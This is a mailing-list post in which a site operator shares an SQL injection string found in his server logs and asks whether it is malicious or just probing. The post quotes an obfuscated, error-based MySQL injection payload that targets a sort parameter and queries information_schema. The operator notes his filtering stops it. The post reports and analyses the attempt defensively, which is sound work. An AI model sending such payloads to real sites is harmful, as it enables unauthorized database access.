SQL injection attempt

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Been a while since I've had a concerted hacker attempt, but over night
this has appeared in the logs.

'sort_mode' => 'last_modified_desc\' and(/**/sElEcT 1
/**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT
/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))
/**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x
/**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)

Does not get anywhere since 'sort_mode' gets filtered in this case to
LAST_MODIFIED DESC and the trash gets ignored. Presume this is some
MySQL hack attempt ( bit lost on Firebird anyway ;) ) but the question
as usual is it malicious in the content of MySQL, or just fishing?

In my case it just white screens anyway so I don't know why they keep
trying to send the same style of url thousands of times?

-- 
Lester Caine - G8HFL
-----------------------------
Contact - http://lsces.co.uk/wiki/?page=contact
L.S.Caine Electronic Services - http://lsces.co.uk
EnquirySolve - http://enquirysolve.com/
Model Engineers Digital Workshop - http://medw.co.uk
Rainbow Digital Media - http://rainbowdigitalmedia.co.uk

-- 
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php





[Index of Archives]     [PHP Home]     [PHP Users]     [Postgresql Discussion]     [Kernel Newbies]     [Postgresql]     [Yosemite News]

  Powered by Linux